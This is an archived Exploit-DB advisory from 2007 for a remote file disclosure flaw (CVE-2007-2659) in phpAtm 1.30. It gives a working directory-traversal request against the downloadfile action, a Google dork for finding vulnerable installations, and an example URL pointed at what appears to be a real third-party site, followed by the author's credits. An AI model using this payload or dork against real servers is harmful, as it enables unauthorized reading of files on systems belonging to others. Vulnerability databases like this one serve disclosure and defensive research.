phpAtm 1.30 downloadfile Remote File Disclosure Vulnerability

2007-05-13T00:00:00
ID EDB-ID:3918
Type exploitdb
Reporter Ali.Mohajem
Modified 2007-05-13T00:00:00

Description

phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability. CVE-2007-2659. Webapps exploit for php platform

                                        
                                            ******************************************************************************************
download page in : http://phpatm.free.fr/
 
bug in : phpatm
injection attack :
 index.php?action=downloadfile&filename=index.php&directory=../&
 
Dork in google : "powered by php advanced transfer manager"
 
example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************
************************************************************************************
found bug by : Ali.Mohajem
Email : Ali.Mohajem@Yahoo.com
Website : wWw.Shayatin-team.com
www.mohajem.net
www.mohajem.org
special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers
*************************************************************************************

# milw0rm.com [2007-05-13]